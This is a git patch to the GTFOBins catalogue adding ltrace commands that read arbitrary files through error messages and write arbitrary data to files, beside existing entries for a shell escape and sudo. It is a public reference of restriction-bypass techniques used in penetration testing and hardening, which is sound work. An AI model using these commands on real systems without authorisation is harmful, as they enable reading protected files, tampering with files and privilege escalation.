From d4f9fa662282a0006b52b388d11f3cfea8640403 Mon Sep 17 00:00:00 2001
From: LinuxSploit <68427058+LinuxSploit@users.noreply.github.com>
Date: Sun, 9 May 2021 11:31:28 -0400
Subject: [PATCH] Add ltrace file-read/write

---
 _gtfobins/ltrace.md | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/_gtfobins/ltrace.md b/_gtfobins/ltrace.md
index 1052235..0b5bb02 100644
--- a/_gtfobins/ltrace.md
+++ b/_gtfobins/ltrace.md
@@ -1,5 +1,15 @@
 ---
 functions:
+  file-read:
+    - description: The file is parsed as a configuration file and its content is shown as error messages, thus this is not suitable to exfiltrate binary files.
+      code: |
+        LFILE=file_to_read
+        ltrace -F $LFILE /dev/null
+  file-write:
+    - description: The data to be written appears amid the library function call log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough. More generally, any binary that executes whatever library function call passing arbitrary data can be used in place of `ltrace -F DATA`.
+      code: |
+        LFILE=file_to_write
+        ltrace -s 999 -o $LFILE ltrace -F DATA
   shell:
     - code: ltrace -b -L /bin/sh
   sudo: